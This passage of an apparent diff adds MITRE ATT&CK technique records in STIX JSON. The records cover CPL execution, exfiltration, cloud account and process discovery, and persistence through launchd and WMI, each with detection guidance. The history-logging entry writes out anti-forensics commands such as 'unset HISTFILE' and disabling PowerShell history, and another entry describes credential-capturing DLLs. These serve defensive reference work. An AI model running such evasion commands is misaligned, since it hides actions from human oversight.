with CPL files, such as the Windows Control Panel process binary (control.exe) and the Control_RunDLL and ControlRunDLLAsUser API functions in shell32.dll. When executed from the command line or clicked, control.exe will execute the CPL file (ex: control.exe file.cpl) before [Rundll32](https://attack.mitre.org/techniques/T1085) is used to call the CPL's API functions (ex: rundll32.exe shell32.dll,Control_RunDLL file.cpl). CPL files can be executed directly via the CPL API function with just the latter [Rundll32](https://attack.mitre.org/techniques/T1085) command, which may bypass detections and/or execution filters for control.exe. (Citation: TrendMicro CPL Malware Jan 2014)\n\nInventory Control Panel items to locate unregistered and potentially malicious files present on systems:\n\n* Executable format registered Control Panel items will have a globally unique identifier (GUID) and registration Registry entries in HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\ControlPanel\\NameSpace and HKEY_CLASSES_ROOT\\CLSID\\{GUID}. These entries may contain information about the Control Panel item such as its display name, path to the local file, and the command executed when opened in the Control Panel. (Citation: Microsoft Implementing CPL)\n* CPL format registered Control Panel items stored in the System32 directory are automatically shown in the Control Panel. Other Control Panel items will have registration entries in the Cpls and Extended Properties Registry keys of HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Control Panel. These entries may include information such as a GUID, path to the local file, and a canonical name used to launch the file programmatically ( WinExec(\"c:\\windows\\system32\\control.exe {Canonical_Name}\", SW_NORMAL);) or from a command line (control.exe /name {Canonical_Name}). (Citation: Microsoft Implementing CPL)\n* Some Control Panel items are extensible via Shell extensions registered in HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Controls Folder\\{name}\\Shellex\\PropertySheetHandlers where {name} is the predefined name of the system item. (Citation: Microsoft Implementing CPL)\n\nAnalyze new Control Panel items as well as those present on disk for malicious content. Both executable and CPL formats are compliant Portable Executable (PE) images and can be examined using traditional tools and methods, pending anti-reverse-engineering techniques. (Citation: TrendMicro CPL Malware Jan 2014)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_defense_bypassed": [ + "Application whitelisting", + "Process whitelisting" + ], + "x_mitre_permissions_required": [ + "User", + "Administrator", + "SYSTEM" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--8df54627-376c-487c-a09c-7d2b5620f56e", + "created": "2018-04-18T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1196", + "external_id": "T1196" + }, + { + "source_name": "Microsoft Implementing CPL", + "description": "M. (n.d.). Implementing Control Panel Items. Retrieved January 18, 2018.", + "url": "https://msdn.microsoft.com/library/windows/desktop/cc144185.aspx" + }, + { + "source_name": "TrendMicro CPL Malware Jan 2014", + "description": "Mercês, F. (2014, January 27). CPL Malware - Malicious Control Panel Items. Retrieved January 18, 2018.", + "url": "https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf" + }, + { + "source_name": "TrendMicro CPL Malware Dec 2013", + "description": "Bernardino, J. (2013, December 17). Control Panel Files Used As Malicious Attachments. Retrieved January 18, 2018.", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/control-panel-files-used-as-malicious-attachments/" + }, + { + "source_name": "Palo Alto Reaver Nov 2017", + "description": "Grunzweig, J. and Miller-Osborn, J. (2017, November 10). New Malware with Ties to SunOrcal Discovered. Retrieved November 16, 2017.", + "url": "https://researchcenter.paloaltonetworks.com/2017/11/unit42-new-malware-with-ties-to-sunorcal-discovered/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Exfiltration Over Asymmetric Encrypted Non-C2 Protocol", + "description": "Adversaries may steal data by exfiltrating it over an asymmetrically encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server. \n\nAsymmetric encryption algorithms are those that use different keys on each end of the channel. Also known as public-key cryptography, this requires pairs of cryptographic keys that can encrypt/decrypt data from the corresponding key. Each end of the communication channels requires a private key (only in the procession of that entity) and the public key of the other entity. The public keys of each entity are exchanged before encrypted communications begin. \n\nNetwork protocols that use asymmetric encryption (such as HTTPS/TLS/SSL) often utilize symmetric encryption once keys are exchanged. Adversaries may opt to use these encrypted mechanisms that are baked into a protocol. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "exfiltration" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "William Cain" + ], + "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious.(Citation: University of Birmingham C2) ", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--8e350c1d-ac79-4b5c-bd4e-7476d7e84ec5", + "created": "2020-03-15T15:34:30.767Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1048/002", + "external_id": "T1048.002" + }, + { + "source_name": "University of Birmingham C2", + "description": "Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.", + "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-10-13T17:57:08.037Z", + "name": "Brute Force I/O", + "description": "Adversaries may repetitively or successively change I/O point values to perform an action. Brute Force I/O may be achieved by changing either a range of I/O point values or a single point value repeatedly to manipulate a process function. The adversary's goal and the information they have about the target environment will influence which of the options they choose. In the case of brute forcing a range of point values, the adversary may be able to achieve an impact without targeting a specific point. In the case where a single point is targeted, the adversary may be able to generate instability on the process function associated with that particular point. \n\nAdversaries may use Brute Force I/O to cause failures within various industrial processes. These failures could be the result of wear on equipment or damage to downstream equipment.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "impair-process-control" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "None" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Operational Databases: Process History/Live Data", + "Application Log: Application Log Content", + "Network Traffic: Network Traffic Content" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--8e7089d3-fba2-44f8-94a8-9a79c53920c4", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0806", + "external_id": "T0806" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Cloud Account", + "description": "Adversaries may attempt to get a listing of cloud accounts. Cloud accounts are those created and configured by an organization for use by users, remote support, services, or for administration of resources within a cloud service provider or SaaS application.\n\nWith authenticated access there are several tools that can be used to find accounts. The Get-MsolRoleMember PowerShell cmdlet can be used to obtain account names given a role or permissions group in Office 365.(Citation: Microsoft msolrolemember)(Citation: GitHub Raindance) The Azure CLI (AZ CLI) also provides an interface to obtain user accounts with authenticated access to a domain. The command az ad user list will list all users within a domain.(Citation: Microsoft AZ CLI)(Citation: Black Hills Red Teaming MS AD Azure, 2018) \n\nThe AWS command aws iam list-users may be used to obtain a list of users in the current account while aws iam list-roles can obtain IAM roles that have a specified path prefix.(Citation: AWS List Roles)(Citation: AWS List Users) In GCP, gcloud iam service-accounts list and gcloud projects get-iam-policy may be used to obtain a listing of service accounts and users in a project.(Citation: Google Cloud - IAM Servie Accounts List API)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "discovery" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Praetorian" + ], + "x_mitre_detection": "Monitor processes, command-line arguments, and logs for actions that could be taken to gather information about cloud accounts, including the use of calls to cloud APIs that perform account discovery.\n\nSystem and network discovery techniques normally occur throughout an operation as an adversary learns the environment, and also to an extent in normal network operations. Therefore discovery data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Azure AD", + "Office 365", + "SaaS", + "IaaS", + "Google Workspace" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "User" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--8f104855-e5b7-4077-b1f5-bc3103b41abe", + "created": "2020-02-21T21:08:36.570Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1087/004", + "external_id": "T1087.004" + }, + { + "source_name": "Microsoft msolrolemember", + "description": "Microsoft. (n.d.). Get-MsolRoleMember. Retrieved October 6, 2019.", + "url": "https://docs.microsoft.com/en-us/powershell/module/msonline/get-msolrolemember?view=azureadps-1.0" + }, + { + "source_name": "GitHub Raindance", + "description": "Stringer, M.. (2018, November 21). RainDance. Retrieved October 6, 2019.", + "url": "https://github.com/True-Demon/raindance" + }, + { + "source_name": "Microsoft AZ CLI", + "description": "Microsoft. (n.d.). az ad user. Retrieved October 6, 2019.", + "url": "https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest" + }, + { + "source_name": "Black Hills Red Teaming MS AD Azure, 2018", + "description": "Felch, M.. (2018, August 31). Red Teaming Microsoft Part 1 Active Directory Leaks via Azure. Retrieved October 6, 2019.", + "url": "https://www.blackhillsinfosec.com/red-teaming-microsoft-part-1-active-directory-leaks-via-azure/" + }, + { + "source_name": "AWS List Roles", + "description": "Amazon. (n.d.). List Roles. Retrieved August 11, 2020.", + "url": "https://docs.aws.amazon.com/cli/latest/reference/iam/list-roles.html" + }, + { + "source_name": "AWS List Users", + "description": "Amazon. (n.d.). List Users. Retrieved August 11, 2020.", + "url": "https://docs.aws.amazon.com/cli/latest/reference/iam/list-users.html" + }, + { + "source_name": "Google Cloud - IAM Servie Accounts List API", + "description": "Google. (2020, June 23). gcloud iam service-accounts list. Retrieved August 4, 2020.", + "url": "https://cloud.google.com/sdk/gcloud/reference/iam/service-accounts/list" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-04-16T12:43:55.369Z", + "name": "Process Discovery", + "description": "Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Administrator or otherwise elevated access may provide better process details. Adversaries may use the information from [Process Discovery](https://attack.mitre.org/techniques/T1057) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\n\nIn Windows environments, adversaries could obtain details on running processes using the [Tasklist](https://attack.mitre.org/software/S0057) utility via [cmd](https://attack.mitre.org/software/S0106) or Get-Process via [PowerShell](https://attack.mitre.org/techniques/T1059/001). Information about processes can also be extracted from the output of [Native API](https://attack.mitre.org/techniques/T1106) calls such as CreateToolhelp32Snapshot. In Mac and Linux, this is accomplished with the ps command. Adversaries may also opt to enumerate processes via `/proc`. \n\nOn network devices, [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `show processes` can be used to display current running processes.(Citation: US-CERT-TA18-106A)(Citation: show_processes_cisco_cmd)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "discovery" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Austin Clark, @c2defense" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nNormal, benign system and network events that look like process discovery may be uncommon, depending on the environment and how they are used. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).\n\nFor network infrastructure devices, collect AAA logging to monitor for `show` commands being run by non-standard users from non-standard locations.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows", + "Network" + ], + "x_mitre_version": "1.5", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--8f4a33ec-8b1f-4b80-a2f6-642b2e479580", + "created": "2017-05-31T21:30:48.728Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1057", + "external_id": "T1057" + }, + { + "source_name": "show_processes_cisco_cmd", + "description": "Cisco. (2022, August 16). show processes - . Retrieved July 13, 2022.", + "url": "https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/fundamentals/command/cf_command_ref/show_monitor_permit_list_through_show_process_memory.html#wp3599497760" + }, + { + "source_name": "US-CERT-TA18-106A", + "description": "US-CERT. (2018, April 20). Alert (TA18-106A) Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices. Retrieved October 19, 2020.", + "url": "https://www.us-cert.gov/ncas/alerts/TA18-106A" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-05-09T14:00:00.188Z", + "name": "Impair Command History Logging", + "description": "Adversaries may impair command history logging to hide commands they run on a compromised system. Various command interpreters keep track of the commands users type in their terminal so that users can retrace what they've done. \n\nOn Linux and macOS, command history is tracked in a file pointed to by the environment variable HISTFILE. When a user logs off a system, this information is flushed to a file in the user's home directory called ~/.bash_history. The HISTCONTROL environment variable keeps track of what should be saved by the history command and eventually into the ~/.bash_history file when a user logs out. HISTCONTROL does not exist by default on macOS, but can be set by the user and will be respected.\n\nAdversaries may clear the history environment variable (unset HISTFILE) or set the command history size to zero (export HISTFILESIZE=0) to prevent logging of commands. Additionally, HISTCONTROL can be configured to ignore commands that start with a space by simply setting it to \"ignorespace\". HISTCONTROL can also be set to ignore duplicate commands by setting it to \"ignoredups\". In some Linux systems, this is set by default to \"ignoreboth\" which covers both of the previous examples. This means that “ ls” will not be saved, but “ls” would be saved by history. Adversaries can abuse this to operate without leaving traces by simply prepending a space to all of their terminal commands. \n\nOn Windows systems, the PSReadLine module tracks commands used in all PowerShell sessions and writes them to a file ($env:APPDATA\\Microsoft\\Windows\\PowerShell\\PSReadLine\\ConsoleHost_history.txt by default). Adversaries may change where these logs are saved using Set-PSReadLineOption -HistorySavePath {File Path}. This will cause ConsoleHost_history.txt to stop receiving logs. Additionally, it is possible to turn off logging to this file using the PowerShell command Set-PSReadlineOption -HistorySaveStyle SaveNothing.(Citation: Microsoft PowerShell Command History)(Citation: Sophos PowerShell command audit)(Citation: Sophos PowerShell Command History Forensics)\n\nAdversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to disable historical command logging (e.g. no logging).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Vikas Singh, Sophos", + "Emile Kenning, Sophos", + "Austin Clark, @c2defense" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Correlating a user session with a distinct lack of new commands in their .bash_history can be a clue to suspicious behavior. Additionally, users checking or changing their HISTCONTROL, HISTFILE, or HISTFILESIZE environment variables may be suspicious.\n\nMonitor for modification of PowerShell command history settings through processes being created with -HistorySaveStyle SaveNothing command-line arguments and use of the PowerShell commands Set-PSReadlineOption -HistorySaveStyle SaveNothing and Set-PSReadLineOption -HistorySavePath {File Path}. Further, [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands may also be used to clear or disable historical log data with built-in features native to the network device platform. Monitor such command activity for unexpected or unauthorized use of commands being run by non-standard users from non-standard locations.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows", + "Network" + ], + "x_mitre_version": "2.2", + "x_mitre_data_sources": [], + "x_mitre_defense_bypassed": [ + "Host forensic analysis", + "Log analysis" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--8f504411-cb96-4dac-a537-8d2bb7679c59", + "created": "2020-02-21T20:56:06.498Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1562/003", + "external_id": "T1562.003" + }, + { + "source_name": "Sophos PowerShell command audit", + "description": "jak. (2020, June 27). Live Discover - PowerShell command audit. Retrieved August 21, 2020.", + "url": "https://community.sophos.com/products/intercept/early-access-program/f/live-discover-response-queries/121529/live-discover---powershell-command-audit" + }, + { + "source_name": "Microsoft PowerShell Command History", + "description": "Microsoft. (2020, May 13). About History. Retrieved September 4, 2020.", + "url": "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_history?view=powershell-7" + }, + { + "source_name": "Sophos PowerShell Command History Forensics", + "description": "Vikas, S. (2020, August 26). PowerShell Command History Forensics. Retrieved September 4, 2020.", + "url": "https://community.sophos.com/products/malware/b/blog/posts/powershell-command-history-forensics" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Launchd", + "description": "This technique is deprecated due to the inaccurate usage. The report cited did not provide technical detail as to how the malware interacted directly with launchd rather than going through known services. Other system services are used to interact with launchd rather than launchd being used by itself. \n\nAdversaries may abuse the Launchd daemon to perform task scheduling for initial or recurring execution of malicious code. The launchd daemon, native to macOS, is responsible for loading and maintaining services within the operating system. This process loads the parameters for each launch-on-demand system-level daemon from the property list (plist) files found in /System/Library/LaunchDaemons and /Library/LaunchDaemons (Citation: AppleDocs Launch Agent Daemons). These LaunchDaemons have property list files which point to the executables that will be launched (Citation: Methods of Mac Malware Persistence).\n\nAn adversary may use the launchd daemon in macOS environments to schedule new executables to run at system startup or on a scheduled basis for persistence. launchd can also be abused to run a process under the context of a specified account. Daemons, such as launchd, run with the permissions of the root user account, and will operate regardless of which user account is logged in.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "execution" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": true, + "x_mitre_detection": "Monitor scheduled task creation from common utilities using command-line invocation. Legitimate scheduled tasks may be created during installation of new software or through system administration functions. Look for changes to tasks that do not correlate with known software, patch cycles, etc. \n\nSuspicious program execution through scheduled tasks may show up as outlier processes that have not been seen before when compared against historical data. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "macOS" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "root" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--8faedf87-dceb-4c35-b2a2-7286f59a3bc3", + "created": "2019-12-03T14:15:27.452Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1053/004", + "external_id": "T1053.004" + }, + { + "source_name": "AppleDocs Launch Agent Daemons", + "description": "Apple. (n.d.). Creating Launch Daemons and Agents. Retrieved July 10, 2017.", + "url": "https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html" + }, + { + "source_name": "Methods of Mac Malware Persistence", + "description": "Patrick Wardle. (2014, September). Methods of Malware Persistence on Mac OS X. Retrieved July 5, 2017.", + "url": "https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-10-31T14:00:00.188Z", + "name": "Network Provider DLL", + "description": "Adversaries may register malicious network provider dynamic link libraries (DLLs) to capture cleartext user credentials during the authentication process. Network provider DLLs allow Windows to interface with specific network protocols and can also support add-on credential management functions.(Citation: Network Provider API) During the logon process, Winlogon (the interactive logon module) sends credentials to the local `mpnotify.exe` process via RPC. The `mpnotify.exe` process then shares the credentials in cleartext with registered credential managers when notifying that a logon event is happening.(Citation: NPPSPY - Huntress)(Citation: NPPSPY Video)(Citation: NPLogonNotify) \n\nAdversaries can configure a malicious network provider DLL to receive credentials from `mpnotify.exe`.(Citation: NPPSPY) Once installed as a credential manager (via the Registry), a malicious DLL can receive and save credentials each time a user logs onto a Windows workstation or domain via the `NPLogonNotify()` function.(Citation: NPLogonNotify)\n\nAdversaries may target planting malicious network provider DLLs on systems known to have increased logon activity and/or administrator logon activity, such as servers and domain controllers.(Citation: NPPSPY - Huntress)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "credential-access" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [ + "CrowdStrike Falcon OverWatch", + "Jai Minton" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--90c4a591-d02d-490b-92aa-619d9701ac04", + "created": "2023-03-30T22:45:00.431Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1556/008", + "external_id": "T1556.008" + }, + { + "source_name": "NPPSPY - Huntress", + "description": " Dray Agha. (2022, August 16). Cleartext Shenanigans: Gifting User Passwords to Adversaries With NPPSPY. Retrieved March 30, 2023.", + "url": "https://www.huntress.com/blog/cleartext-shenanigans-gifting-user-passwords-to-adversaries-with-nppspy" + }, + { + "source_name": "NPPSPY Video", + "description": "Grzegorz Tworek. (2021, December 14). How winlogon.exe shares the cleartext password with custom DLLs. Retrieved March 30, 2023.", + "url": "https://www.youtube.com/watch?v=ggY3srD9dYs" + }, + { + "source_name": "NPPSPY", + "description": "Grzegorz Tworek. (2021, December 15). NPPSpy. Retrieved March 30, 2023.", + "url": "https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy" + }, + { + "source_name": "Network Provider API", + "description": "Microsoft. (2021, January 7). Network Provider API. Retrieved March 30, 2023.", + "url": "https://learn.microsoft.com/en-us/windows/win32/secauthn/network-provider-api" + }, + { + "source_name": "NPLogonNotify", + "description": "Microsoft. (2021, October 21). NPLogonNotify function (npapi.h). Retrieved March 30, 2023.", + "url": "https://learn.microsoft.com/en-us/windows/win32/api/npapi/nf-npapi-nplogonnotify" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-04-13T14:08:20.882Z", + "name": "Windows Management Instrumentation Event Subscription", + "description": "Adversaries may establish persistence and elevate privileges by executing malicious content triggered by a Windows Management Instrumentation (WMI) event subscription. WMI can be used to install event filters, providers, consumers, and bindings that execute code when a defined event occurs. Examples of events that may be subscribed to are the wall clock time, user login, or the computer's uptime.(Citation: Mandiant M-Trends 2015)\n\nAdversaries may use the capabilities of WMI to subscribe to an event and execute arbitrary code when that event occurs, providing persistence on a system.(Citation: FireEye WMI SANS 2015)(Citation: FireEye WMI 2015) Adversaries may also compile WMI scripts – using `mofcomp.exe` –into Windows Management Object (MOF) files (.mof extension) that can be used to create a malicious subscription.(Citation: Dell WMI Persistence)(Citation: Microsoft MOF May 2018)\n\nWMI subscription execution is proxied by the WMI Provider Host process (WmiPrvSe.exe) and thus may result in elevated SYSTEM privileges.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Brent Murphy, Elastic", + "David French, Elastic", + "Viren Chaudhari, Qualys" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor WMI event subscription entries, comparing current WMI event subscriptions to known good subscriptions for each host. Tools such as Sysinternals Autoruns may also be used to detect WMI changes that could be attempts at persistence.(Citation: TechNet Autoruns)(Citation: Medium Detecting WMI Persistence) Monitor for the creation of new WMI EventFilter, EventConsumer, and FilterToConsumerBinding events. Event ID 5861 is logged on Windows 10 systems when new EventFilterToConsumerBinding events are created.(Citation: Elastic - Hunting for Persistence Part 1)\n\nMonitor processes and command-line arguments that can be used to register WMI persistence, such as the Register-WmiEvent [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlet, as well as those that result from the execution of subscriptions (i.e. spawning from the WmiPrvSe.exe WMI Provider Host process).(Citation: Microsoft Register-WmiEvent)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.4", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "Administrator", + "SYSTEM" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--910906dd-8c0a-475a-9cc1-5e029e2fad58", + "created": "2020-01-24T14:07:56.276Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1546/003", + "external_id": "T1546.003" + }, + { + "source_name": "FireEye WMI 2015", + "description": "Ballenthin, W., et al. (2015). Windows Management Instrumentation (WMI) Offense, Defense, and Forensics. Retrieved March 30, 2016.", + "url": "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf" + }, + { + "source_name": "Dell WMI Persistence", + "description": "Dell SecureWorks Counter Threat Unit™ (CTU) Research Team. (2016, March 28). A Novel WMI Persistence Implementation. Retrieved March 30, 2016.", + "url": "https://www.secureworks.com/blog/wmi-persistence" + }, + { + "source_name": "FireEye WMI SANS 2015", + "description": "Devon Kerr. (2015). There's Something About WMI. Retrieved May 4, 2020.", + "url": "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/sans-dfir-2015.pdf" + }, + { + "source_name": "Medium Detecting WMI Persistence", + "description": "French, D. (2018, October 9). Detecting & Removing an Attacker’s WMI Persistence. Retrieved October 11, 2019.", + "url": "https://medium.com/threatpunter/detecting-removing-wmi-persistence-60ccbb7dff96" + }, + { + "source_name": "Elastic - Hunting for Persistence Part 1", + "description": "French, D., Murphy, B. (2020, March 24). Adversary tradecraft 101: Hunting for persistence using Elastic Security (Part 1). Retrieved December 21, 2020.", + "url": "https://www.elastic.co/blog/hunting-for-persistence-using-elastic-security-part-1" + }, + { + "source_name": "Mandiant M-Trends 2015", + "description": "Mandiant. (2015, February 24). M-Trends 2015: A View from the Front Lines. Retrieved May 18, 2016.", + "url": "https://www2.fireeye.com/rs/fireye/images/rpt-m-trends-2015.pdf" + }, + { + "source_name": "Microsoft Register-WmiEvent", + "description": "Microsoft. 